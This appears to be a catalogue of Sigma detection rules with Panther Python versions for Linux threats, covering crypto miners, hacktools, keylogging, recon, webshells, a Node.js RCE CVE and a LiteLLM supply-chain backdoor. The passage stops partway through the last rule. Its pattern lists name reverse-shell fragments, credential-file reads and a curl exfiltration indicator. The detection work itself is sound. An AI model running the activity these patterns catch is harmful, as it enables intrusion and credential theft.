falsepositives:
    - Unknown
level: high
level: high · quality: Moderate · alert volume: High FP
Linux Crypto Mining Indicators
Detects command line parameters or strings often used by crypto miners
status: test · author: Florian Roth (Nextron Systems) · ATT&CK mapping: technique · id: 9069ea3c-b213-4c52-be13-86506a227ab1
panther query
def rule(event):
    if any(
        [
            " --cpu-priority=" in event.deep_get("CommandLine", default=""),
            "--donate-level=0" in event.deep_get("CommandLine", default=""),
            " -o pool." in event.deep_get("CommandLine", default=""),
            " --nicehash" in event.deep_get("CommandLine", default=""),
            " --algo=rx/0 " in event.deep_get("CommandLine", default=""),
            "stratum+tcp://" in event.deep_get("CommandLine", default=""),
            "stratum+udp://" in event.deep_get("CommandLine", default=""),
            "sh -c /sbin/modprobe msr allow_writes=on" in event.deep_get("CommandLine", default=""),
            "LS1kb25hdGUtbGV2ZWw9" in event.deep_get("CommandLine", default=""),
            "0tZG9uYXRlLWxldmVsP" in event.deep_get("CommandLine", default=""),
            "tLWRvbmF0ZS1sZXZlbD" in event.deep_get("CommandLine", default=""),
            "c3RyYXR1bSt0Y3A6Ly" in event.deep_get("CommandLine", default=""),
            "N0cmF0dW0rdGNwOi8v" in event.deep_get("CommandLine", default=""),
            "zdHJhdHVtK3RjcDovL" in event.deep_get("CommandLine", default=""),
            "c3RyYXR1bSt1ZHA6Ly" in event.deep_get("CommandLine", default=""),
            "N0cmF0dW0rdWRwOi8v" in event.deep_get("CommandLine", default=""),
            "zdHJhdHVtK3VkcDovL" in event.deep_get("CommandLine", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Linux Crypto Mining Indicators
id: 9069ea3c-b213-4c52-be13-86506a227ab1
status: test
description: Detects command line parameters or strings often used by crypto miners
references:
    - https://www.poolwatch.io/coin/monero
author: Florian Roth (Nextron Systems)
date: 2021-10-26
modified: 2022-12-25
tags:
    - attack.impact
    - attack.t1496
logsource:
    product: linux
    category: process_creation
detection:
    selection:
        CommandLine|contains:
            - ' --cpu-priority='
            - '--donate-level=0'
            - ' -o pool.'
            - ' --nicehash'
            - ' --algo=rx/0 '
            - 'stratum+tcp://'
            - 'stratum+udp://'
            # Sub process started by xmrig - the most popular Monero crypto miner - unknown if this causes any false positives
            - 'sh -c /sbin/modprobe msr allow_writes=on'
            # base64 encoded: --donate-level=
            - 'LS1kb25hdGUtbGV2ZWw9'
            - '0tZG9uYXRlLWxldmVsP'
            - 'tLWRvbmF0ZS1sZXZlbD'
            # base64 encoded: stratum+tcp:// and stratum+udp://
            - 'c3RyYXR1bSt0Y3A6Ly'
            - 'N0cmF0dW0rdGNwOi8v'
            - 'zdHJhdHVtK3RjcDovL'
            - 'c3RyYXR1bSt1ZHA6Ly'
            - 'N0cmF0dW0rdWRwOi8v'
            - 'zdHJhdHVtK3VkcDovL'
    condition: selection
falsepositives:
    - Legitimate use of crypto miners
level: high
level: high · quality: Strong · alert volume: Medium FP
Linux Crypto Mining Pool Connections
Detects process connections to a Monero crypto mining pool
status: stable · author: Florian Roth (Nextron Systems) · ATT&CK mapping: technique · id: a46c93b7-55ed-4d27-a41b-c259456c4746
panther query
def rule(event):
    if event.deep_get("DestinationHostname", default="") in [
        "pool.minexmr.com",
        "fr.minexmr.com",
        "de.minexmr.com",
        "sg.minexmr.com",
        "ca.minexmr.com",
        "us-west.minexmr.com",
        "pool.supportxmr.com",
        "mine.c3pool.com",
        "xmr-eu1.nanopool.org",
        "xmr-eu2.nanopool.org",
        "xmr-us-east1.nanopool.org",
        "xmr-us-west1.nanopool.org",
        "xmr-asia1.nanopool.org",
        "xmr-jp1.nanopool.org",
        "xmr-au1.nanopool.org",
        "xmr.2miners.com",
        "xmr.hashcity.org",
        "xmr.f2pool.com",
        "xmrpool.eu",
        "pool.hashvault.pro",
        "moneroocean.stream",
        "monerocean.stream",
    ]:
        return True
    return False
view Sigma YAML
title: Linux Crypto Mining Pool Connections
id: a46c93b7-55ed-4d27-a41b-c259456c4746
status: stable
description: Detects process connections to a Monero crypto mining pool
references:
    - https://www.poolwatch.io/coin/monero
author: Florian Roth (Nextron Systems)
date: 2021-10-26
tags:
    - attack.impact
    - attack.t1496
logsource:
    product: linux
    category: network_connection
detection:
    selection:
        DestinationHostname:
            - 'pool.minexmr.com'
            - 'fr.minexmr.com'
            - 'de.minexmr.com'
            - 'sg.minexmr.com'
            - 'ca.minexmr.com'
            - 'us-west.minexmr.com'
            - 'pool.supportxmr.com'
            - 'mine.c3pool.com'
            - 'xmr-eu1.nanopool.org'
            - 'xmr-eu2.nanopool.org'
            - 'xmr-us-east1.nanopool.org'
            - 'xmr-us-west1.nanopool.org'
            - 'xmr-asia1.nanopool.org'
            - 'xmr-jp1.nanopool.org'
            - 'xmr-au1.nanopool.org'
            - 'xmr.2miners.com'
            - 'xmr.hashcity.org'
            - 'xmr.f2pool.com'
            - 'xmrpool.eu'
            - 'pool.hashvault.pro'
            - 'moneroocean.stream'
            - 'monerocean.stream'
    condition: selection
falsepositives:
    - Legitimate use of crypto miners
level: high
level: high · quality: Strong · alert volume: Medium FP
Linux HackTool Execution
Detects known hacktool execution based on image name.
status: test · author: Nasreddine Bencherchali (Nextron Systems), Georg Lauenstein (sure[secure]) · ATT&CK mapping: technique · id: a015e032-146d-4717-8944-7a1884122111
panther query
def rule(event):
    if any(
        [
            any(
                [
                    event.deep_get("Image", default="").endswith("/crackmapexec"),
                    event.deep_get("Image", default="").endswith("/havoc"),
                    event.deep_get("Image", default="").endswith("/merlin-agent"),
                    event.deep_get("Image", default="").endswith("/merlinServer-Linux-x64"),
                    event.deep_get("Image", default="").endswith("/msfconsole"),
                    event.deep_get("Image", default="").endswith("/msfvenom"),
                    event.deep_get("Image", default="").endswith("/ps-empire server"),
                    event.deep_get("Image", default="").endswith("/ps-empire"),
                    event.deep_get("Image", default="").endswith("/sliver-client"),
                    event.deep_get("Image", default="").endswith("/sliver-server"),
                    event.deep_get("Image", default="").endswith("/Villain.py"),
                ]
            ),
            any(
                [
                    "/cobaltstrike" in event.deep_get("Image", default=""),
                    "/teamserver" in event.deep_get("Image", default=""),
                ]
            ),
            any(
                [
                    event.deep_get("Image", default="").endswith("/autorecon"),
                    event.deep_get("Image", default="").endswith("/httpx"),
                    event.deep_get("Image", default="").endswith("/legion"),
                    event.deep_get("Image", default="").endswith("/naabu"),
                    event.deep_get("Image", default="").endswith("/netdiscover"),
                    event.deep_get("Image", default="").endswith("/nuclei"),
                    event.deep_get("Image", default="").endswith("/recon-ng"),
                ]
            ),
            "/sniper" in event.deep_get("Image", default=""),
            any(
                [
                    event.deep_get("Image", default="").endswith("/dirb"),
                    event.deep_get("Image", default="").endswith("/dirbuster"),
                    event.deep_get("Image", default="").endswith("/eyewitness"),
                    event.deep_get("Image", default="").endswith("/feroxbuster"),
                    event.deep_get("Image", default="").endswith("/ffuf"),
                    event.deep_get("Image", default="").endswith("/gobuster"),
                    event.deep_get("Image", default="").endswith("/wfuzz"),
                    event.deep_get("Image", default="").endswith("/whatweb"),
                ]
            ),
            any(
                [
                    event.deep_get("Image", default="").endswith("/joomscan"),
                    event.deep_get("Image", default="").endswith("/nikto"),
                    event.deep_get("Image", default="").endswith("/wpscan"),
                ]
            ),
            any(
                [
                    event.deep_get("Image", default="").endswith("/aircrack-ng"),
                    event.deep_get("Image", default="").endswith("/bloodhound-python"),
                    event.deep_get("Image", default="").endswith("/bpfdos"),
                    event.deep_get("Image", default="").endswith("/ebpfki"),
                    event.deep_get("Image", default="").endswith("/evil-winrm"),
                    event.deep_get("Image", default="").endswith("/hashcat"),
                    event.deep_get("Image", default="").endswith("/hoaxshell.py"),
                    event.deep_get("Image", default="").endswith("/hydra"),
                    event.deep_get("Image", default="").endswith("/john"),
                    event.deep_get("Image", default="").endswith("/ncrack"),
                    event.deep_get("Image", default="").endswith("/nxc-ubuntu-latest"),
                    event.deep_get("Image", default="").endswith("/pidhide"),
                    event.deep_get("Image", default="").endswith("/pspy32"),
                    event.deep_get("Image", default="").endswith("/pspy32s"),
                    event.deep_get("Image", default="").endswith("/pspy64"),
                    event.deep_get("Image", default="").endswith("/pspy64s"),
                    event.deep_get("Image", default="").endswith("/setoolkit"),
                    event.deep_get("Image", default="").endswith("/sqlmap"),
                    event.deep_get("Image", default="").endswith("/writeblocker"),
                ]
            ),
            "/linpeas" in event.deep_get("Image", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Linux HackTool Execution
id: a015e032-146d-4717-8944-7a1884122111
status: test
description: Detects known hacktool execution based on image name.
references:
    - https://github.com/Gui774ume/ebpfkit
    - https://github.com/pathtofile/bad-bpf
    - https://github.com/carlospolop/PEASS-ng
    - https://github.com/t3l3machus/hoaxshell
    - https://github.com/t3l3machus/Villain
    - https://github.com/HavocFramework/Havoc
    - https://github.com/1N3/Sn1per
    - https://github.com/Ne0nd0g/merlin
    - https://github.com/Pennyw0rth/NetExec/
author: Nasreddine Bencherchali (Nextron Systems), Georg Lauenstein (sure[secure])
date: 2023-01-03
modified: 2024-09-19
tags:
    - attack.execution
    - attack.resource-development
    - attack.t1587
logsource:
    product: linux
    category: process_creation
detection:
    selection_c2_frameworks:
        Image|endswith:
            - '/crackmapexec'
            - '/havoc'
            - '/merlin-agent'
            - '/merlinServer-Linux-x64'
            - '/msfconsole'
            - '/msfvenom'
            - '/ps-empire server'
            - '/ps-empire'
            - '/sliver-client'
            - '/sliver-server'
            - '/Villain.py'
    selection_c2_framework_cobaltstrike:
        Image|contains:
            - '/cobaltstrike'
            - '/teamserver'
    selection_scanners:
        Image|endswith:
            - '/autorecon'
            - '/httpx'
            - '/legion'
            - '/naabu'
            - '/netdiscover'
            - '/nuclei'
            - '/recon-ng'
    selection_scanners_sniper:
        Image|contains: '/sniper'
    selection_web_enum:
        Image|endswith:
            - '/dirb'
            - '/dirbuster'
            - '/eyewitness'
            - '/feroxbuster'
            - '/ffuf'
            - '/gobuster'
            - '/wfuzz'
            - '/whatweb'
    selection_web_vuln:
        Image|endswith:
            - '/joomscan'
            - '/nikto'
            - '/wpscan'
    selection_exploit_tools:
        Image|endswith:
            - '/aircrack-ng'
            - '/bloodhound-python'
            - '/bpfdos'
            - '/ebpfki'
            - '/evil-winrm'
            - '/hashcat'
            - '/hoaxshell.py'
            - '/hydra'
            - '/john'
            - '/ncrack'
            # default binary: https://github.com/Pennyw0rth/NetExec/releases/download/v1.0.0/nxc-ubuntu-latest
            - '/nxc-ubuntu-latest'
            - '/pidhide'
            - '/pspy32'
            - '/pspy32s'
            - '/pspy64'
            - '/pspy64s'
            - '/setoolkit'
            - '/sqlmap'
            - '/writeblocker'
    selection_linpeas:
        # covers: all linux versions listed here: https://github.com/carlospolop/PEASS-ng/releases
        Image|contains: '/linpeas'
    condition: 1 of selection_*
falsepositives:
    - Unlikely
level: high
level: high · quality: Strong · alert volume: Low FP
Linux Keylogging with Pam.d
Detects attempts to enable auditing of TTY input
status: test · author: Pawel Mazur · ATT&CK mapping: sub-technique · id: 49aae26c-450e-448b-911d-b3c13d178dfc
panther query
def rule(event):
    if any(
        [
            all(
                [
                    event.deep_get("type", default="") == "PATH",
                    event.deep_get("name", default="")
                    in ["/etc/pam.d/system-auth", "/etc/pam.d/password-auth"],
                ]
            ),
            event.deep_get("type", default="") in ["TTY", "USER_TTY"],
        ]
    ):
        return True
    return False
view Sigma YAML
title: Linux Keylogging with Pam.d
id: 49aae26c-450e-448b-911d-b3c13d178dfc
status: test
description: Detect attempt to enable auditing of TTY input
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md
    - https://linux.die.net/man/8/pam_tty_audit
    - https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing
    - https://access.redhat.com/articles/4409591#audit-record-types-2
author: 'Pawel Mazur'
date: 2021-05-24
modified: 2022-12-18
tags:
    - attack.collection
    - attack.credential-access
    - attack.t1003
    - attack.t1056.001
logsource:
    product: linux
    service: auditd
detection:
    selection_path_events:
        type: PATH
        name:
            - '/etc/pam.d/system-auth'
            - '/etc/pam.d/password-auth'
    selection_tty_events:
        type:
            - 'TTY'
            - 'USER_TTY'
    condition: 1 of selection_*
falsepositives:
    - Administrative work
level: high
level: high · quality: Moderate · alert volume: High FP
Linux Recon Indicators
Detects events with patterns found in commands used for reconnaissance on Linux systems
status: test · author: Florian Roth (Nextron Systems) · ATT&CK mapping: sub-technique · id: 0cf7a157-8879-41a2-8f55-388dd23746b7
panther query
def rule(event):
    if any(
        [
            " -name .htpasswd" in event.deep_get("CommandLine", default=""),
            " -perm -4000 " in event.deep_get("CommandLine", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Linux Recon Indicators
id: 0cf7a157-8879-41a2-8f55-388dd23746b7
status: test
description: Detects events with patterns found in commands used for reconnaissance on linux systems
references:
    - https://github.com/sleventyeleven/linuxprivchecker/blob/0d701080bbf92efd464e97d71a70f97c6f2cd658/linuxprivchecker.py
author: Florian Roth (Nextron Systems)
date: 2022-06-20
tags:
    - attack.reconnaissance
    - attack.t1592.004
    - attack.credential-access
    - attack.t1552.001
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        CommandLine|contains:
            - ' -name .htpasswd'
            - ' -perm -4000 '
    condition: selection
falsepositives:
    - Legitimate administration activities
level: high
level: high · quality: Moderate · alert volume: Medium FP
Linux Suspicious Child Process from Node.js - React2Shell
Detects suspicious child processes spawned from Node.js server processes on Linux systems, potentially indicating remote code execution exploitation such as CVE-2025-55182 (React2Shell). This rule particularly looks for exploitation of the vulnerability on Node.js servers where attackers abuse the Node.js child_process module to execute arbitrary system commands. When execSync() or exec() is used, the command line often includes a shell invocation followed by suspicious commands or scripts (e.g., /bin/sh -c <malicious-command>). For other methods, the Image field will show the spawned process directly.
status: experimental · author: Swachchhanda Shrawan Poudel (Nextron Systems), Nasreddine Bencherchali · ATT&CK mapping: technique · id: c70834fa-fb9d-4aa0-9e7d-45ceed36f3f7
panther query
def rule(event):
    if all(
        [
            event.deep_get("ParentImage", default="").endswith("/node"),
            any(
                [
                    "--experimental-https" in event.deep_get("ParentCommandLine", default=""),
                    "--experimental-next-config-strip-types"
                    in event.deep_get("ParentCommandLine", default=""),
                    "/node_modules/next" in event.deep_get("ParentCommandLine", default=""),
                    "next dev" in event.deep_get("ParentCommandLine", default=""),
                    "next start" in event.deep_get("ParentCommandLine", default=""),
                    "node_modules/.bin" in event.deep_get("ParentCommandLine", default=""),
                    "react-scripts start" in event.deep_get("ParentCommandLine", default=""),
                    "start-server.js" in event.deep_get("ParentCommandLine", default=""),
                ]
            ),
            any(
                [
                    any(
                        [
                            any(
                                [
                                    any(
                                        [
                                            event.deep_get("Image", default="").endswith(
                                                "/busybox"
                                            ),
                                            event.deep_get("Image", default="").endswith("/cat"),
                                            event.deep_get("Image", default="").endswith("/curl"),
                                            event.deep_get("Image", default="").endswith("/dash"),
                                            event.deep_get("Image", default="").endswith("/dig"),
                                            event.deep_get("Image", default="").endswith("/head"),
                                            event.deep_get("Image", default="").endswith("/id"),
                                            event.deep_get("Image", default="").endswith(
                                                "/ifconfig"
                                            ),
                                            event.deep_get("Image", default="").endswith("/ip"),
                                            event.deep_get("Image", default="").endswith("/java"),
                                            event.deep_get("Image", default="").endswith("/less"),
                                            event.deep_get("Image", default="").endswith("/lua"),
                                            event.deep_get("Image", default="").endswith("/more"),
                                            event.deep_get("Image", default="").endswith("/nc"),
                                            event.deep_get("Image", default="").endswith("/ncat"),
                                            event.deep_get("Image", default="").endswith("/netcat"),
                                            event.deep_get("Image", default="").endswith(
                                                "/netstat"
                                            ),
                                            event.deep_get("Image", default="").endswith(
                                                "/nslookup"
                                            ),
                                            event.deep_get("Image", default="").endswith("/perl"),
                                            event.deep_get("Image", default="").endswith("/ping"),
                                            event.deep_get("Image", default="").endswith("/python"),
                                            event.deep_get("Image", default="").endswith(
                                                "/python2"
                                            ),
                                            event.deep_get("Image", default="").endswith("/ruby"),
                                            event.deep_get("Image", default="").endswith("/socat"),
                                            event.deep_get("Image", default="").endswith("/tail"),
                                            event.deep_get("Image", default="").endswith("/wget"),
                                            event.deep_get("Image", default="").endswith("/whoami"),
                                        ]
                                    ),
                                    "/python" in event.deep_get("Image", default=""),
                                ]
                            ),
                            any(
                                [
                                    "/dev/tcp/" in event.deep_get("CommandLine", default=""),
                                    "/dev/udp/" in event.deep_get("CommandLine", default=""),
                                    "/etc/hosts" in event.deep_get("CommandLine", default=""),
                                    "/etc/passwd" in event.deep_get("CommandLine", default=""),
                                    "/etc/shadow" in event.deep_get("CommandLine", default=""),
                                    "base64" in event.deep_get("CommandLine", default=""),
                                    "cat " in event.deep_get("CommandLine", default=""),
                                    "curl" in event.deep_get("CommandLine", default=""),
                                    "dig" in event.deep_get("CommandLine", default=""),
                                    "ifconfig" in event.deep_get("CommandLine", default=""),
                                    "IO::Socket::INET" in event.deep_get("CommandLine", default=""),
                                    "java" in event.deep_get("CommandLine", default=""),
                                    "less " in event.deep_get("CommandLine", default=""),
                                    "lua" in event.deep_get("CommandLine", default=""),
                                    "mkfifo " in event.deep_get("CommandLine", default=""),
                                    "more" in event.deep_get("CommandLine", default=""),
                                    "nc " in event.deep_get("CommandLine", default=""),
                                    "ncat" in event.deep_get("CommandLine", default=""),
                                    "netcat" in event.deep_get("CommandLine", default=""),
                                    "netstat" in event.deep_get("CommandLine", default=""),
                                    "nslookup" in event.deep_get("CommandLine", default=""),
                                    "perl" in event.deep_get("CommandLine", default=""),
                                    "php" in event.deep_get("CommandLine", default=""),
                                    "ping" in event.deep_get("CommandLine", default=""),
                                    "ps -ef" in event.deep_get("CommandLine", default=""),
                                    "ps aux" in event.deep_get("CommandLine", default=""),
                                    "python" in event.deep_get("CommandLine", default=""),
                                    "rcat" in event.deep_get("CommandLine", default=""),
                                    "ruby" in event.deep_get("CommandLine", default=""),
                                    "sh -i 2>&1" in event.deep_get("CommandLine", default=""),
                                    "-c id" in event.deep_get("CommandLine", default=""),
                                    "socat" in event.deep_get("CommandLine", default=""),
                                    "uname" in event.deep_get("CommandLine", default=""),
                                    "wget" in event.deep_get("CommandLine", default=""),
                                    "whoami" in event.deep_get("CommandLine", default=""),
                                ]
                            ),
                        ]
                    ),
                    all(
                        [
                            event.deep_get("Image", default="").endswith("/sh"),
                            not event.deep_get("Image", default="").endswith("-c"),
                        ]
                    ),
                    all(
                        [
                            event.deep_get("Image", default="").endswith("/sh"),
                            event.deep_get("Image", default="").endswith("-c"),
                            any(
                                [
                                    "/dev/tcp/" in event.deep_get("CommandLine", default=""),
                                    "/dev/udp/" in event.deep_get("CommandLine", default=""),
                                    "/etc/hosts" in event.deep_get("CommandLine", default=""),
                                    "/etc/passwd" in event.deep_get("CommandLine", default=""),
                                    "/etc/shadow" in event.deep_get("CommandLine", default=""),
                                    "base64" in event.deep_get("CommandLine", default=""),
                                    "cat " in event.deep_get("CommandLine", default=""),
                                    "curl" in event.deep_get("CommandLine", default=""),
                                    "dig" in event.deep_get("CommandLine", default=""),
                                    "ifconfig" in event.deep_get("CommandLine", default=""),
                                    "IO::Socket::INET" in event.deep_get("CommandLine", default=""),
                                    "java" in event.deep_get("CommandLine", default=""),
                                    "less " in event.deep_get("CommandLine", default=""),
                                    "lua" in event.deep_get("CommandLine", default=""),
                                    "mkfifo " in event.deep_get("CommandLine", default=""),
                                    "more" in event.deep_get("CommandLine", default=""),
                                    "nc " in event.deep_get("CommandLine", default=""),
                                    "ncat" in event.deep_get("CommandLine", default=""),
                                    "netcat" in event.deep_get("CommandLine", default=""),
                                    "netstat" in event.deep_get("CommandLine", default=""),
                                    "nslookup" in event.deep_get("CommandLine", default=""),
                                    "perl" in event.deep_get("CommandLine", default=""),
                                    "php" in event.deep_get("CommandLine", default=""),
                                    "ping" in event.deep_get("CommandLine", default=""),
                                    "ps -ef" in event.deep_get("CommandLine", default=""),
                                    "ps aux" in event.deep_get("CommandLine", default=""),
                                    "python" in event.deep_get("CommandLine", default=""),
                                    "rcat" in event.deep_get("CommandLine", default=""),
                                    "ruby" in event.deep_get("CommandLine", default=""),
                                    "sh -i 2>&1" in event.deep_get("CommandLine", default=""),
                                    "-c id" in event.deep_get("CommandLine", default=""),
                                    "socat" in event.deep_get("CommandLine", default=""),
                                    "uname" in event.deep_get("CommandLine", default=""),
                                    "wget" in event.deep_get("CommandLine", default=""),
                                    "whoami" in event.deep_get("CommandLine", default=""),
                                ]
                            ),
                        ]
                    ),
                ]
            ),
        ]
    ):
        return True
    return False
sigma yaml
title: Linux Suspicious Child Process from Node.js - React2Shell
id: c70834fa-fb9d-4aa0-9e7d-45ceed36f3f7
related:
    - id: 271de298-cc0e-4842-acd8-079a0a99ea65
      type: similar
status: experimental
description: |
    Detects suspicious child processes spawned from Node.js server processes on Linux systems, potentially indicating remote code execution exploitation such as CVE-2025-55182 (React2Shell).
    This rule particularly looks for exploitation of vulnerability on Node.js Servers where attackers abuse Node.js child_process module to execute arbitrary system commands.
    When execSync() or exec() is used, the command line often includes a shell invocation followed by suspicious commands or scripts (e.g., /bin/sh -c <malicious-command>).
    For other methods, the Image field will show the spawned process directly.
references:
    - https://github.com/msanft/CVE-2025-55182
    - https://nodejs.org/api/child_process.html#class-childprocess
    - https://gist.github.com/swachchhanda000/a0228130f86a2dedfbcebb415b47f870
    - https://github.com/nasbench/Misc-Research/blob/2f651ede832ab34027a7ba005b63bb78f1ade378/Other/React-Next-Child-Processes-Notes.md
author: Swachchhanda Shrawan Poudel (Nextron Systems), Nasreddine Bencherchali
date: 2025-12-05
tags:
    - attack.execution
    - attack.t1059
    - attack.initial-access
    - attack.t1190
    - detection.emerging-threats
    - cve.2025-55182
logsource:
    category: process_creation
    product: linux
detection:
    selection_parent:
        ParentImage|endswith: '/node'
        ParentCommandLine|contains:
            - '--experimental-https'
            - '--experimental-next-config-strip-types'
            - '/node_modules/next'
            - 'next dev'
            - 'next start'
            - 'node_modules/.bin'
            - 'react-scripts start'
            - 'start-server.js'
    selection_generic_child_img:
        # Observed when child_process.spawn(), child_process.exec(), child_process.execFile(), or child_process.fork() method is used to spawn suspicious processes in exploit
        - Image|endswith:
              - '/busybox'
              - '/cat'
              - '/curl'
              - '/dash'
              - '/dig'
              - '/head'
              - '/id'
              - '/ifconfig'
              - '/ip'
              - '/java'
              - '/less'
              - '/lua'
              - '/more'
              - '/nc'
              - '/ncat'
              - '/netcat'
              - '/netstat'
              - '/nslookup'
              - '/perl'
              - '/ping'
              - '/python'
              - '/python2'
              - '/ruby'
              - '/socat'
              - '/tail'
              - '/wget'
              - '/whoami'
        - Image|contains: '/python'
    selection_generic_child_cli:
        # Observed when child_process.execSync() is used to spawn suspicious processes
        # Reference: https://nodejs.org/api/child_process.html#child_processexecsynccommand-options
        # By default, the cli will look something like `/bin/sh -c .......`
        CommandLine|contains:
            - '/dev/tcp/'
            - '/dev/udp/'
            - '/etc/hosts'
            - '/etc/passwd'
            - '/etc/shadow'
            - 'base64'
            - 'cat '
            - 'curl'
            - 'dig'
            - 'ifconfig'
            - 'IO::Socket::INET'
            - 'java'
            - 'less '
            - 'lua'
            - 'mkfifo '
            - 'more'
            - 'nc '
            - 'ncat'
            - 'netcat'
            - 'netstat'
            - 'nslookup'
            - 'perl'
            - 'php'
            - 'ping'
            - 'ps -ef'
            - 'ps aux'
            - 'python'
            - 'rcat'
            - 'ruby'
            - 'sh -i 2>&1'
            - '-c id'
            - 'socat'
            - 'uname'
            - 'wget'
            - 'whoami'
    selection_specific_sh:
        Image|endswith: '/sh'
    selection_specific_cli:
        Image|endswith: '-c'
    filter_main_default_shell_flag:
        Image|endswith: '-c'
    condition:
        selection_parent and
        (
            1 of selection_generic_*
            or
            (selection_specific_sh and not filter_main_default_shell_flag)
            or
            (all of selection_specific_* and selection_generic_child_cli)
        )
falsepositives:
    - Unknown
level: high
level: high · quality: Strong · alert volume: Medium FP
Linux Webshell Indicators
Detects suspicious sub-processes of web server processes
status: test · author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: sub-technique · id: 818f7b24-0fba-4c49-a073-8b755573b9c7
panther query
def rule(event):
    if all(
        [
            any(
                [
                    any(
                        [
                            event.deep_get("ParentImage", default="").endswith("/httpd"),
                            event.deep_get("ParentImage", default="").endswith("/lighttpd"),
                            event.deep_get("ParentImage", default="").endswith("/nginx"),
                            event.deep_get("ParentImage", default="").endswith("/apache2"),
                            event.deep_get("ParentImage", default="").endswith("/node"),
                            event.deep_get("ParentImage", default="").endswith("/caddy"),
                        ]
                    ),
                    all(
                        [
                            "/bin/java" in event.deep_get("ParentCommandLine", default=""),
                            "tomcat" in event.deep_get("ParentCommandLine", default=""),
                        ]
                    ),
                    all(
                        [
                            "/bin/java" in event.deep_get("ParentCommandLine", default=""),
                            "websphere" in event.deep_get("ParentCommandLine", default=""),
                        ]
                    ),
                ]
            ),
            any(
                [
                    event.deep_get("Image", default="").endswith("/whoami"),
                    event.deep_get("Image", default="").endswith("/ifconfig"),
                    event.deep_get("Image", default="").endswith("/ip"),
                    event.deep_get("Image", default="").endswith("/bin/uname"),
                    event.deep_get("Image", default="").endswith("/bin/cat"),
                    event.deep_get("Image", default="").endswith("/bin/crontab"),
                    event.deep_get("Image", default="").endswith("/hostname"),
                    event.deep_get("Image", default="").endswith("/iptables"),
                    event.deep_get("Image", default="").endswith("/netstat"),
                    event.deep_get("Image", default="").endswith("/pwd"),
                    event.deep_get("Image", default="").endswith("/route"),
                ]
            ),
        ]
    ):
        return True
    return False
sigma yaml
title: Linux Webshell Indicators
id: 818f7b24-0fba-4c49-a073-8b755573b9c7
status: test
description: Detects suspicious sub processes of web server processes
references:
    - https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/
    - https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF
author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2021-10-15
modified: 2022-12-28
tags:
    - attack.persistence
    - attack.t1505.003
logsource:
    product: linux
    category: process_creation
detection:
    selection_general:
        ParentImage|endswith:
            - '/httpd'
            - '/lighttpd'
            - '/nginx'
            - '/apache2'
            - '/node'
            - '/caddy'
    selection_tomcat:
        ParentCommandLine|contains|all:
            - '/bin/java'
            - 'tomcat'
    selection_websphere:  # ? just guessing
        ParentCommandLine|contains|all:
            - '/bin/java'
            - 'websphere'
    sub_processes:
        Image|endswith:
            - '/whoami'
            - '/ifconfig'
            - '/ip'
            - '/bin/uname'
            - '/bin/cat'
            - '/bin/crontab'
            - '/hostname'
            - '/iptables'
            - '/netstat'
            - '/pwd'
            - '/route'
    condition: 1 of selection_* and sub_processes
falsepositives:
    - Web applications that invoke Linux command line tools
level: high
level: high · quality: Moderate · alert volume: Medium FP
LiteLLM / TeamPCP Supply Chain Attack Indicators
Detects process executions related to the backdoored versions of LiteLLM (v1.82.7 or v1.82.8). In March 2026, a supply chain attack on the popular open-source LLM framework LiteLLM by the threat actor TeamPCP was discovered. The malicious package harvests every credential on the system, encrypts and exfiltrates them, and installs a persistent C2 backdoor.
status: experimental · author: Swachchhanda Shrawan Poudel (Nextron Systems) · ATT&CK mapping: sub-technique · id: 36603778-030c-43c4-8cbb-cd3c1d1a80c7
panther query
def rule(event):
    if any(
        [
            all(
                [
                    "/python3" in event.deep_get("Image", default=""),
                    "exec(base64.b64decode('aW1wb3J0" in event.deep_get("CommandLine", default=""),
                    "kI2NF9TQ1JJUFQgPSAiYV" in event.deep_get("CommandLine", default=""),
                ]
            ),
            all(
                [
                    event.deep_get("Image", default="").endswith("/tar"),
                    "tpcp.tar.gz" in event.deep_get("CommandLine", default=""),
                    "payload.enc" in event.deep_get("CommandLine", default=""),
                    "session.key.enc" in event.deep_get("CommandLine", default=""),
                ]
            ),
            all(
                [
                    event.deep_get("Image", default="").endswith("/curl"),
                    "models.litellm.cloud" in event.deep_get("CommandLine", default=""),
                    "X-Filename: tpcp.tar.gz" in event.deep_get("CommandLine", default=""),
                ]
            ),
            all(
                [
                    "/python3" in event.deep_get("ParentImage", default=""),
                    "systemctl" in event.deep_get("CommandLine", default=""),
                    "--user" in event.deep_get("CommandLine", default=""),
                    "sysmon" in event.deep_get("CommandLine", default=""),
                ]
            ),
        ]
    ):
        return True
    return False
sigma yaml
title: LiteLLM / TeamPCP Supply Chain Attack Indicators
id: 36603778-030c-43c4-8cbb-cd3c1d1a80c7
status: experimental
description: |
    Detects process executions related to the backdoored versions of LiteLLM (v1.82.7 or v1.82.8).
    In March 2026, a supply chain attack was discovered involving the popular open-source LLM framework LiteLLM by Threat Actor TeamPCP.
    The malicious package harvests every credential on the system, encrypts and exfiltrates them, and installs a persistent C2 backdoor.
references:
    - https://novasky.io/hunts/hunting-litellm-supply-chain
    - https://www.virustotal.com/gui/file/71e35aef03099cd1f2d6446734273025a163597de93912df321ef118bf135238/
    - https://huskyhacks.io/posts/litellm-cred-stealer/
    - https://www.wiz.io/blog/threes-a-crowd-teampcp-trojanizes-litellm-in-continuation-of-campaign
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2026-03-30
tags:
    - attack.initial-access
    - attack.t1195.002
    - attack.collection
    - attack.t1560.001
    - attack.persistence
    - attack.privilege-escalation
    - attack.t1543.002
    - detection.emerging-threats
logsource:
    category: process_creation
    product: linux
detection:
    selection_pth_package:
        # Execution of .pth file
        Image|contains: '/python3'
        CommandLine|contains|all:
            - "exec(base64.b64decode('aW1wb3J0"
            - "kI2NF9TQ1JJUFQgPSAiYV"
    selection_tar:
        Image|endswith: '/tar'
        CommandLine|contains|all:
            - 'tpcp.tar.gz'
